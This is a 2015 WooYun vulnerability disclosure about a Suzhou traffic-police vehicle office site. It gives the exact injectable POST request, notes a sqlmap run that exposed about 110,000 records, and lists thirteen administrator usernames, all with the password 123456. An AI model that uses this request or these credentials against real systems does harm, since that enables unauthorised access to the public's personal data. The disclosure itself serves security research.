当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128949

漏洞标题:苏州市公安局交通警察支队车辆管理所SQL注入及弱口令,大量用户信息泄漏

相关厂商:苏州市公安局交通警察支队车辆管理所

漏洞作者: 诚殷的小白帽

提交时间:2015-07-24 14:19

修复时间:2015-09-10 11:18

公开时间:2015-09-10 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

其实问题挺多的

详细说明:

网上车管所管理员入口处post注入

http://www.szcgs.com.cn/wscgs2/Query_cond.aspx


然后得到post包

POST /wscgs2/Query_cond.aspx HTTP/1.1
Host: www.szcgs.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.szcgs.com.cn/wscgs2/Query_cond.aspx
Cookie: ASP.NET_SessionId=hduyj555npcuaq45e4n4oxez
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 722
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzIwNzk3Nzg5D2QWAmYPZBYCAgMPZBYEAgEPDxYCHgRUZXh0BR4yMDE15bm0N%2BaciDI05pelICAgICDmmJ%2FmnJ%2FkupRkZAIDD2QWBAIBDw8WAh8ABXUmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDvovpPlhaXnrqHnkIblkZjnlKjmiLflkI3lkozlr4bnoIHvvIzlj6%2Flr7npooTnuqbkuJrliqHov5vooYznu5%2ForqHmn6Xor6LjgIJkZAIFD2QWAgILDw8WAh8ABQQzODg1ZGRkdLRBrqrunvR4%2B2R32dQTNgx2ne0%3D&__VIEWSTATEGENERATOR=BACEFA3B&__EVENTVALIDATION=%2FwEWBQKct7GwBwLJ4frZBwLYtr%2BxAgK8%2FvbCDgKt7K6OCxZ6L0nWuH%2FKye1Ozvm76gb%2ByR7x&ctl00%24ContentPlaceHolder1%24txtUsername=1&ctl00%24ContentPlaceHolder1%24txtLsh=1&ctl00%24ContentPlaceHolder1%24txtCod=3885&ctl00%24ContentPlaceHolder1%24btnNext=%E4%B8%8B%E4%B8%80%E6%AD%A5


上神器sqlmap,

N0GV9(VA(_@_TR`QFR]5}[H.jpg

N]QBHPE%E))6RY9%{9[PXMY.jpg

随便挑个跑一下,数据是有11万之多的

5U(3_L3N_MR_9~97O1[}SY3.jpg

然后再看一下管理员入口,弱口令上去,

1.png

随便挑个打开,里面是预约的信息

2.png

多个帐号都是弱口令

szadmin 123456
tcadmin 123456
wjadmin 123456
ksadmin 123456
zjgadmin 123456
csadmin 123456
djqadmin 123456
xcadmin 123456
wzadmin 123456
yqadmin 123456
hqadmin 123456
gsadmin 123456
gskycadmin 123456

漏洞证明:

2.png

5U(3_L3N_MR_9~97O1[}SY3.jpg

修复方案:

过滤,修改弱口令

版权声明:转载请注明来源 诚殷的小白帽@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-27 11:16

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无